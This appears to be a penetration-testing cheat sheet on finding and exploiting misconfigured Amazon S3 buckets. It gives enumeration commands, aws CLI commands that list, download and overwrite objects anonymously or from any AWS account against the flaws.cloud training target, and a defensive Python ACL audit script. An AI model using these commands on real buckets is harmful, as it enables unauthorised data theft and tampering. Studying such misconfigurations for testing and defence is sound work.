S3 Bucket Enumeration

Lazys3 - Ruby Script

  • ruby lazys3.rb <company>

  • ruby lazys3.rb pakwheels


Cloud_enum

  • sudo apt install cloud-enum

  • cloud_enum -k flaws.cloud --disable-azure --disable-gcp


S3BucketList - Browser Extension

Manual Installation


Exploiting S3 Unauthenticated

  • sudo apt-get install awscli

  • cloud_enum -k flaws.cloud --disable-azure --disable-gcp

  • aws s3 ls s3://flaws.cloud/ --no-sign-request

  • Download - aws s3 cp s3://flaws.cloud/secret.html ./ --no-sign-request

  • Upload - aws s3 cp ./index.html s3://flaws.cloud/secret.html --no-sign-request


Exploiting S3 Authenticated

  • Create a free AWS account

  • Go to AWS IAM dashboard

  • Users → Add New user with programmatic access credential type

  • Once user is created, note down the access key and secret access key

  • Click User → Permissions → Add permissions → Attach existing policies → AmazonS3FullAccess

  • aws configure --profile someone

  • aws s3 --profile someone ls s3://flaws.cloud/

  • aws s3 --profile someone cp s3://flaws.cloud/something.html ./
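
Defender-side check for the two cases above (anonymous access and access from any AWS account), as an added example that is not part of the original page: it reads a bucket ACL in the JSON shape returned by `aws s3api get-bucket-acl` and reports grants to the predefined AllUsers and AuthenticatedUsers groups. The function name `audit_bucket_acl` and the sample ACL are constructed for illustration; only ACL grants are covered, bucket policies are not evaluated.

```python
import json

# Predefined S3 ACL grantee groups.
ALL_USERS = "http://acs.amazonaws.com/groups/global/AllUsers"
AUTH_USERS = "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"
AUDIENCE = {ALL_USERS: "anonymous", AUTH_USERS: "any-aws-account"}

# What each bucket-level ACL permission lets the grantee do.
EFFECT = {
    "READ": "list objects",
    "WRITE": "create, overwrite and delete objects",
    "READ_ACP": "read the bucket ACL",
    "WRITE_ACP": "replace the bucket ACL",
}

def audit_bucket_acl(acl_json):
    """Return sorted (audience, permission, effect) tuples for public grants."""
    findings = set()
    for grant in json.loads(acl_json).get("Grants", []):
        grantee = grant.get("Grantee", {})
        audience = AUDIENCE.get(grantee.get("URI"))
        if grantee.get("Type") != "Group" or audience is None:
            continue  # owner, named accounts, log delivery group
        perm = grant.get("Permission", "")
        # FULL_CONTROL is shorthand for all four permissions above.
        for p in (EFFECT if perm == "FULL_CONTROL" else [perm]):
            findings.add((audience, p, EFFECT.get(p, "unrecognised permission")))
    return sorted(findings)

# Constructed sample, not taken from any real bucket.
SAMPLE_ACL = json.dumps({
    "Owner": {"ID": "constructed-owner-id"},
    "Grants": [
        {"Grantee": {"Type": "CanonicalUser", "ID": "constructed-owner-id"},
         "Permission": "FULL_CONTROL"},
        {"Grantee": {"Type": "Group", "URI": ALL_USERS}, "Permission": "READ"},
        {"Grantee": {"Type": "Group", "URI": AUTH_USERS}, "Permission": "WRITE"},
    ],
})

if __name__ == "__main__":
    for audience, perm, effect in audit_bucket_acl(SAMPLE_ACL):
        print(f"{audience}: {perm} -> can {effect}")
```

An empty result means the bucket ACL grants nothing to either group; object-level ACLs and the bucket policy still need their own review.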
